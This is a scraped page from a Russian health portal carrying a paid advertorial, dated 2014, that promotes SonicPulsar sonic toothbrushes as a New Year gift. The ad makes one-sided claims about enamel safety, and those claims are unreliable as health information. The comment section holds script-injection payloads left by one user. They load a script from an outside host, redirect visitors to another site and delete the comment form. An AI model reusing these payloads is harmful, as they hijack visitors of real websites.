Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Красивая улыбка – лучший ...  >>  Красивая улыбка – лучший новогодний подарок!
 
Обратная связь
 

Красивая улыбка – лучший новогодний подарок!

Размер шрифта
10 декабря 2014 00:00
  • google_analytics: false
  • Нравится

Согласитесь, дарить подарки намного приятнее, чем получать их. Но вот выбирать их зачастую – просто невыносимое мучение. Одни подарки радуют взор, но совершенно бесполезны с практической точки зрения. Другие, напротив, в хозяйстве пригодятся, но скучны до вывиха челюсти. Наконец, третьи всем хороши, но чтобы купить один из таких, придется перейти на хлеб и воду как минимум до следующей зарплаты. Что и говорить, в предновогодний сезон голова готова расколоться на куски!

Красивая улыбка – лучший новогодний подарок

Но голова вам еще пригодится, не так ли? К счастью, у вас есть мы, и мы готовы избавить вас от мук выбора прямо сейчас. Потому что мы знаем, что такое идеальный подарок на новый год!

Речь идет о звуковых зубных щетках SonicPulsar от компании CS Medica. Это изящный ультра-современный гаджет для здоровья ротовой полости. В новый год с голливудской улыбкой – это ли не розовая мечта большинства из нас?

Механические (то есть обычные) зубные щетки уступают буквально по всем статьям.

Вот, скажем, интенсивность процесса. Ваша рука с щеткой способна совершить до пятисот амплитудных движений в минуту. Много? Сравните с щетками от SonicPulsar – насадки этих чудо-приборов колеблются с частотой 22 000-33000 в минуту, то есть почти в 50 раз чаще! Представляете, насколько более скрупулезным получается процесс чистки зубов! Это как современный пылесос против веника с совком!

Но что это? Слышим ропот негодования с задних рядов. Вот не по годам пытливый гражданин, начитавшись сомнительных источников информации, утверждает, что все эти буржуазные стоматологические гаджеты вовсю портят зубную эмаль! В отличие от, значит, классических щеток. Правда ли это? С точностью до наоборот! Пользуясь механической щеткой, человек совершенно инстинктивно старается прижимать ее к зубам как можно плотнее, чтобы, как ему кажется, счищать «грязь» с максимальным эффектом. Однако такое усердие на пользу отнюдь не идет – жесткая щетина безжалостно царапает эмаль, постепенно уничтожая ее.

Звуковая же щетка едва касается зубов, поэтому абсолютно безопасна для зубной эмали. И не только для нее: щетки SonicPulsar очень бережно относятся к вашим деснам. Вместо грубых, а зачастую и просто «кровавых» поползновений щетины – лишь легкий массаж, который не только приятен, но и исключительно полезен для здоровья десен, потому что способствует улучшению кровотока в них.

Другим важным отличием звуковых щеток от классических является возможность тонко регулировать их функцию. Во-первых, в программу прибора прописано несколько режимов работы; вы можете выбрать максимально комфортный именно для вашего рта. Во-вторых, в комплект входят несколько различных насадок.

В общем и целом, стандартные зубные щетки должны отправиться туда, где их давно заждались пейджеры, кнопочные телефоны, аудиомагнитофоны и прочие некогда полезные, а ныне архаичные изобретения. Щетки SonicPulsar – это кусочек будущего в вашей ванне. И, конечно, идеальный подарок на новый год!

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Violensa

19 декабря 2014 в 13:21

Комментарий удален за нарушение Правил общения

2 - Pety1236

21 декабря 2014 в 15:21

Комментарий удален за нарушение Правил общения

3 - zzzzzz

30 июня 2015 в 18:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 21:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:24

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как получить красивую улыбку?   Выпали зубы? Не беда! Ученые научились делать их из мочи   Производители зубных щеток не хотят, чтобы вы это знали!   Мифы и правда о кариесе  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Почему вам не нравится ваша улыбка на фото?
Детские проблемы, которые вы еще можете исправить во взрослой жизни
Как получить белые зубы

Тесты

1
Как правильно чистить зубы
Оцените здоровье ваших зубов
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.